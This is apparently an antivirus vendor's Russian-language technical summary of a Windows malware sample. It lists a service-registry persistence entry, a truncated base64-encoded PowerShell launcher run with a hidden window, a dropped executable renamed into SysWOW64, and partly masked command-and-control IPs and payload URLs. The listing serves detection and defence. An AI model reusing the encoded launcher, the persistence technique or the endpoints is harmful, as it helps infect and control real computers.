Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\dmime] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\dmime] 'ImagePath' = '"%WINDIR%\SysWOW64\dmime\dmime.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABIAHAAcQBvAG4AYQBiAHkAbABrAGUAPQAnAFIAdgB5AHgAcwBnAHMAcgBuAGEAJwA7ACQATABqAGUAYgBnAGsAeQBzAGgAIAA9ACAAJwAzADMAMAAnADsAJABYAGcAdQBoAGUAYgBzAGkAYwBuAG4AawA9ACcAUAB2AHIAdQBnAGwAcwBqAGwAbQAnAD...
- %HOMEPATH%\330.exe
- %HOMEPATH%\330.exe в %WINDIR%\syswow64\dmime\dmime.exe
- '47.##5.214.239':80
- '47.##5.214.239':443
- '20#.#46.22.34':443
- http://al###sonq.com/web_map/UkwFMlO/
- http://no#####.strzelecki.org/wp-includes/6jGh/
- http://20#.##6.22.34:443/leTeBjvynp13uh8Sr/YE4WE/04SAUaJAO2zNisJonJM/OUknwJ82ki6eglwA/ via 20#.#46.22.34
- DNS ASK al###sonq.com
- DNS ASK no#####.strzelecki.org
- '%HOMEPATH%\330.exe'
- '%WINDIR%\syswow64\dmime\dmime.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABIAHAAcQBvAG4AYQBiAHkAbABrAGUAPQAnAFIAdgB5AHgAcwBnAHMAcgBuAGEAJwA7ACQATABqAGUAYgBnAGsAeQBzAGgAIAA9ACAAJwAzADMAMAAnADsAJABYAGcAdQBoAGUAYgBzAGkAYwBuAG4AawA9ACcAUAB2AHIAdQBnAGwAcwBqAGwAbQAnAD...' (со скрытым окном)